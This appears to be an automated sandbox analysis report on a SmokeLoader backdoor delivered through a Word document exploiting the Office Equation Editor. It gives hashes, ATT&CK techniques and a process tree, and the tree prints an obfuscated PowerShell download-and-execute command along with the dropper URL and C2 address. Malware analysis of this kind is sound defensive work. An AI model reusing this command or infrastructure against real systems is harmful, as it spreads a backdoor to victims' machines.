smokeloader | 06b686985f4246819d7fed52a2b9fc1dbed7406d80f902d655866aed61392cbd

General

Target

2021lk049459.doc
Size

2.2MB
MD5

40f9df41effa8762858974452db083d9
SHA1

fd382c2ae4ad3545b5d198d8c51735045584f8ce
SHA256

06b686985f4246819d7fed52a2b9fc1dbed7406d80f902d655866aed61392cbd
SHA512

f09b0b5415ac3f1c9af5f13774bb01675540a3238ac23301b404f13fb847f62725e7ad03f7de7b0fbecf19c90ee2be53b5e7b09aada12780f7685258b54f58f2

Score

10^/10

smokeloader backdoor trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://u.teknik.io/bHrgG.jpg

Extracted

Family

smokeloader

Version

2018

C2

http://94.140.114.59/1/

rc4.i32

Signatures

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Blocklisted process makes network request 4 IoCs

Processes:

EQNEDT32.EXEpowershell.exe

flow pid process

6 1368 EQNEDT32.EXE
8 1368 EQNEDT32.EXE
10 1368 EQNEDT32.EXE
11 1752 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

69577.exenTvWNOa.exe

pid process

296 69577.exe
1228 nTvWNOa.exe
Loads dropped DLL 3 IoCs

Processes:

EQNEDT32.EXEpowershell.exe

pid process

1368 EQNEDT32.EXE
1752 powershell.exe
1752 powershell.exe

flow	pid	process
6	1368	EQNEDT32.EXE
8	1368	EQNEDT32.EXE
10	1368	EQNEDT32.EXE
11	1752	powershell.exe

pid	process
296	69577.exe
1228	nTvWNOa.exe

pid	process
1368	EQNEDT32.EXE
1752	powershell.exe
1752	powershell.exe

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

nTvWNOa.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	nTvWNOa.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	nTvWNOa.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

1368 EQNEDT32.EXE

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	process
1368	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

768 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

640 powershell.exe
640 powershell.exe
1752 powershell.exe
1752 powershell.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

nTvWNOa.exe

pid process

1228 nTvWNOa.exe
1228 nTvWNOa.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 640 powershell.exe
Token: SeDebugPrivilege 1752 powershell.exe
Suspicious use of FindShellTrayWindow 11 IoCs

Processes:

69577.exe

pid process

296 69577.exe
296 69577.exe
296 69577.exe
296 69577.exe
296 69577.exe
296 69577.exe
296 69577.exe
296 69577.exe
296 69577.exe
296 69577.exe
296 69577.exe
Suspicious use of SendNotifyMessage 11 IoCs

Processes:

69577.exe

pid process

296 69577.exe
296 69577.exe
296 69577.exe
296 69577.exe
296 69577.exe
296 69577.exe
296 69577.exe
296 69577.exe
296 69577.exe
296 69577.exe
296 69577.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

768 WINWORD.EXE
768 WINWORD.EXE

pid	process
768	WINWORD.EXE

pid	process
640	powershell.exe
640	powershell.exe
1752	powershell.exe
1752	powershell.exe

pid	process
1228	nTvWNOa.exe
1228	nTvWNOa.exe

description	pid	process
Token: SeDebugPrivilege	640	powershell.exe
Token: SeDebugPrivilege	1752	powershell.exe

pid	process
296	69577.exe
296	69577.exe
296	69577.exe
296	69577.exe
296	69577.exe
296	69577.exe
296	69577.exe
296	69577.exe
296	69577.exe
296	69577.exe
296	69577.exe

pid	process
296	69577.exe
296	69577.exe
296	69577.exe
296	69577.exe
296	69577.exe
296	69577.exe
296	69577.exe
296	69577.exe
296	69577.exe
296	69577.exe
296	69577.exe

pid	process
768	WINWORD.EXE
768	WINWORD.EXE

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WINWORD.EXEEQNEDT32.EXE69577.exepowershell.exepowershell.exe

description	pid	process	target process
PID 768 wrote to memory of 852	768	WINWORD.EXE	splwow64.exe
PID 768 wrote to memory of 852	768	WINWORD.EXE	splwow64.exe
PID 768 wrote to memory of 852	768	WINWORD.EXE	splwow64.exe
PID 768 wrote to memory of 852	768	WINWORD.EXE	splwow64.exe
PID 1368 wrote to memory of 296	1368	EQNEDT32.EXE	69577.exe
PID 1368 wrote to memory of 296	1368	EQNEDT32.EXE	69577.exe
PID 1368 wrote to memory of 296	1368	EQNEDT32.EXE	69577.exe
PID 1368 wrote to memory of 296	1368	EQNEDT32.EXE	69577.exe
PID 296 wrote to memory of 640	296	69577.exe	powershell.exe
PID 296 wrote to memory of 640	296	69577.exe	powershell.exe
PID 296 wrote to memory of 640	296	69577.exe	powershell.exe
PID 296 wrote to memory of 640	296	69577.exe	powershell.exe
PID 640 wrote to memory of 1752	640	powershell.exe	powershell.exe
PID 640 wrote to memory of 1752	640	powershell.exe	powershell.exe
PID 640 wrote to memory of 1752	640	powershell.exe	powershell.exe
PID 640 wrote to memory of 1752	640	powershell.exe	powershell.exe
PID 1752 wrote to memory of 1228	1752	powershell.exe	nTvWNOa.exe
PID 1752 wrote to memory of 1228	1752	powershell.exe	nTvWNOa.exe
PID 1752 wrote to memory of 1228	1752	powershell.exe	nTvWNOa.exe
PID 1752 wrote to memory of 1228	1752	powershell.exe	nTvWNOa.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2021lk049459.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:768

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:852

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1368

C:\Users\Public\69577.exe
"C:\Users\Public\69577.exe"
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:296

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1752

C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
"C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe"
5⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious behavior: MapViewOfSection
PID:1228

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
MD5
3cf58ec9de521b32015552ca3024d1cd

SHA1
539236ecd9d859f82f89311bfd564906aa98451e

SHA256
ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace

SHA512
25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
8ae81224c95faf7008d0f5778a8badf0

SHA1
2e4930dddf0bb31c9bf139181029f83c0d4e65c5

SHA256
a425f2b734ab7b2ee6d417299a38958f3b63c558c8fb29d0b4bb34a1d0458922

SHA512
b7c34aa6d4ed0c16f61beeee5e3ddc5d58e5fb61085d76cc60c2ac09e8601209ca43c1e029e901f003764cd1f6c665010b9e3cedfadc533c873613a0330ade23

Download Submit
C:\Users\Public\69577.exe
MD5
2c2cb2aa0782874d3c14cdd6f063f979

SHA1
583c43ca939f9d8a4eea53a7d71157ac3571a350

SHA256
c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da

SHA512
34c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26

Download Submit
C:\Users\Public\69577.exe
MD5
2c2cb2aa0782874d3c14cdd6f063f979

SHA1
583c43ca939f9d8a4eea53a7d71157ac3571a350

SHA256
c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da

SHA512
34c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26

Download Submit
\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
MD5
3cf58ec9de521b32015552ca3024d1cd

SHA1
539236ecd9d859f82f89311bfd564906aa98451e

SHA256
ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace

SHA512
25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599

Download Submit
\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
MD5
3cf58ec9de521b32015552ca3024d1cd

SHA1
539236ecd9d859f82f89311bfd564906aa98451e

SHA256
ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace

SHA512
25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599

Download Submit
\Users\Public\69577.exe
MD5
2c2cb2aa0782874d3c14cdd6f063f979

SHA1
583c43ca939f9d8a4eea53a7d71157ac3571a350

SHA256
c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da

SHA512
34c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26

Download Submit
memory/296-66-0x0000000000000000-mapping.dmp

Download
memory/640-77-0x0000000004850000-0x0000000004851000-memory.dmp

Filesize
4KB

Download
memory/640-70-0x0000000000000000-mapping.dmp

Download
memory/640-72-0x0000000000940000-0x0000000000941000-memory.dmp

Filesize
4KB

Download
memory/640-73-0x0000000004930000-0x0000000004931000-memory.dmp

Filesize
4KB

Download
memory/640-74-0x00000000048F0000-0x00000000048F1000-memory.dmp

Filesize
4KB

Download
memory/640-75-0x00000000048F2000-0x00000000048F3000-memory.dmp

Filesize
4KB

Download
memory/640-76-0x0000000002420000-0x0000000002421000-memory.dmp

Filesize
4KB

Download
memory/768-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/768-59-0x0000000072C81000-0x0000000072C84000-memory.dmp

Filesize
12KB

Download
memory/768-112-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/768-60-0x0000000070701000-0x0000000070703000-memory.dmp

Filesize
8KB

Download
memory/852-62-0x0000000000000000-mapping.dmp

Download
memory/852-63-0x000007FEFC181000-0x000007FEFC183000-memory.dmp

Filesize
8KB

Download
memory/1228-107-0x0000000000000000-mapping.dmp

Download
memory/1288-110-0x0000000002200000-0x0000000002201000-memory.dmp

Filesize
4KB

Download
memory/1288-111-0x00000000021E0000-0x00000000021F5000-memory.dmp

Filesize
84KB

Download
memory/1368-64-0x0000000075EF1000-0x0000000075EF3000-memory.dmp

Filesize
8KB

Download
memory/1752-104-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1752-85-0x00000000048E2000-0x00000000048E3000-memory.dmp

Filesize
4KB

Download
memory/1752-103-0x0000000006400000-0x0000000006401000-memory.dmp

Filesize
4KB

Download
memory/1752-102-0x00000000062E0000-0x00000000062E1000-memory.dmp

Filesize
4KB

Download
memory/1752-84-0x00000000048E0000-0x00000000048E1000-memory.dmp

Filesize
4KB

Download
memory/1752-95-0x00000000061E0000-0x00000000061E1000-memory.dmp

Filesize
4KB

Download
memory/1752-94-0x00000000057F0000-0x00000000057F1000-memory.dmp

Filesize
4KB

Download
memory/1752-89-0x00000000056B0000-0x00000000056B1000-memory.dmp

Filesize
4KB

Download
memory/1752-78-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads